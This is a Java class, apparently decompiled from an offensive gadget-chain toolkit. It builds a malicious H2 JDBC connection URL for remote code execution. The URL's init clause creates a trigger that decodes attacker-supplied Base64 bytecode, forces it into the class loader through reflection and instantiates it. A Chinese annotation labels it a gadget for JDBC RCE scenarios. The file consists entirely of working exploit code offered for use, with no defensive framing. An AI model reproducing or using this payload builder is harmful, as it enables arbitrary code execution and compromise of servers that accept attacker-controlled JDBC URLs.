package com.ar3h.chains.gadget.impl.common.jdbc.h2;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.tomcat.util.codec.binary.Base64;

@GadgetAnnotation(name = "H2 JDBC URL Java加载任意字节码2", description = "适用于jdbc rce场景，通过H2的 TRIGGER 功能，控制javac编译器执行任意Java代码，加载字节码", dependencies = {"com.h2database:h2:org.h2.Driver"}, authors = {Authors.Unam4, Authors.Sk}, priority = 30)
@GadgetTags(tags = {Tag.H2JdbcUrl, Tag.JdbcUrlChains, Tag.END}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/h2/H2JavaJdbc2.class */
public class H2JavaJdbc2 implements Gadget {
    public String driverClassName = "org.h2.Driver";

    public String getObject(byte[] bArr) {
        return "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER loader BEFORE SELECT ON\nINFORMATION_SCHEMA.TABLES AS $$void loader() throws java.lang.Exception{\nString tomcatStr=\"" + Base64.encodeBase64String(bArr) + "\"\\;\nbyte[] standBytes=new sun.misc.BASE64Decoder().decodeBuffer(tomcatStr)\\;\njava.lang.reflect.Method defineClassMethod=java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\",standBytes.getClass(),int.class,int.class)\\;\ndefineClassMethod.setAccessible(true)\\;\njava.lang.Class myclass=(java.lang.Class)defineClassMethod.invoke(java.lang.Thread.currentThread().getContextClassLoader(),standBytes,0,standBytes.length)\\;\nmyclass.newInstance()\\;}\n$$";
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        byte[] bArr = (byte[]) gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return getObject(bArr);
    }
}
